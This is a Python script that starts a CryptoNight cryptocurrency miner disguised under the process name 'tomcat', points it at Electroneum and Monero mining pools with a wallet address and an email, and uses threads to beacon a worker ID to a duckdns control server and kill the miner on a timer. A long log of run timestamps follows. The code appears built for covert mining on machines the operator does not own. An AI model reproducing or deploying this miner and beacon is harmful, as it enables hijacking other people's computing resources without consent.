import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:05:03.795652
#2018-02-17 16:51:07.651403
#2018-02-17 18:40:07.462686
#2018-02-17 20:28:07.577575
#2018-02-17 22:16:07.279320
#2018-02-18 00:00:10.671485
#2018-02-18 01:51:07.230614
#2018-02-18 03:39:07.164737
#2018-02-18 05:27:05.877871
#2018-02-18 07:19:06.151187
#2018-02-18 09:07:07.233814
#2018-02-18 10:53:01.356685
#2018-02-18 12:40:04.512848
#2018-02-18 14:27:05.212278
#2018-02-18 16:17:05.087200
#2018-02-18 18:06:06.769960
#2018-02-18 19:52:04.830252
#2018-02-18 21:38:05.453595
#2018-02-18 23:26:06.209249
#2018-02-19 01:13:03.700124
#2018-02-19 02:58:05.354417
#2018-02-19 04:45:03.992558
#2018-02-19 06:31:01.712037
#2018-02-19 08:20:03.614957
#2018-02-19 10:09:01.551263
#2018-02-19 11:58:06.308072
#2018-02-19 13:45:07.855189
#2018-02-19 15:34:01.559044
#2018-02-19 17:21:07.505449
#2018-02-19 19:08:07.625046
#2018-02-19 20:53:07.326813
#2018-02-19 22:42:01.569067
#2018-02-20 00:26:07.881005
#2018-02-20 02:13:01.763616
#2018-02-20 04:03:07.400524
#2018-02-20 05:47:04.398624
#2018-02-20 07:33:03.965249
#2018-02-20 09:17:03.867707
#2018-02-20 11:01:06.991202
#2018-02-20 12:47:06.968081
#2018-02-20 14:31:06.793928
#2018-02-20 16:15:01.563801
#2018-02-20 18:01:12.022836
#2018-02-20 19:52:08.756606
#2018-02-20 21:39:07.579367
#2018-02-20 23:20:06.107160
#2018-02-21 01:05:08.435056
#2018-02-21 02:51:06.769382
#2018-02-21 04:40:01.711846
#2018-02-21 06:27:01.830061
#2018-02-21 08:12:07.631859
#2018-02-21 09:59:04.690830
#2018-02-21 11:47:04.403604
#2018-02-21 13:38:04.056261
#2018-02-21 15:21:08.084094
#2018-02-21 17:13:04.656375
#2018-02-21 19:00:11.356287
#2018-02-21 20:45:09.026232
#2018-02-21 22:29:06.803195
#2018-02-22 00:19:02.017722
#2018-02-22 02:05:08.894145
#2018-02-22 03:51:04.543253
#2018-02-22 05:39:07.120611
#2018-02-22 07:24:01.883535
#2018-02-22 09:12:02.093264
#2018-02-22 10:59:03.850758
#2018-02-22 12:44:04.273728
#2018-02-22 14:30:01.384260
#2018-02-22 16:16:12.142913
#2018-02-22 18:02:08.116663
#2018-02-22 19:52:05.731389
#2018-02-22 21:42:06.183214
#2018-02-22 23:29:04.469990
#2018-02-23 01:16:07.060901
#2018-02-23 03:03:08.532841
#2018-02-23 04:51:05.830355
#2018-02-23 06:37:03.443926
#2018-02-23 08:26:04.878105
#2018-02-23 10:40:12.912625
#2018-02-23 12:34:09.780791
#2018-02-23 14:20:09.278119
#2018-02-23 16:11:06.096294
#2018-02-23 17:57:08.180729
#2018-02-23 19:44:06.704969
#2018-02-23 21:27:05.751037
#2018-02-23 23:14:07.123618
#2018-02-24 00:59:05.049704
#2018-02-24 02:53:05.520688
#2018-02-24 04:43:05.195984
#2018-02-24 06:27:07.251922
#2018-02-24 08:16:05.477076
#2018-02-24 10:01:01.982083
#2018-02-24 11:58:04.450501
#2018-02-24 13:45:10.132649
#2018-02-24 15:33:01.260329
#2018-02-24 17:27:04.678323
#2018-02-24 19:14:06.724305
#2018-02-24 21:02:03.692219
#2018-02-24 23:34:06.161881
#2018-02-25 03:34:03.911456
#2018-02-25 07:10:06.339544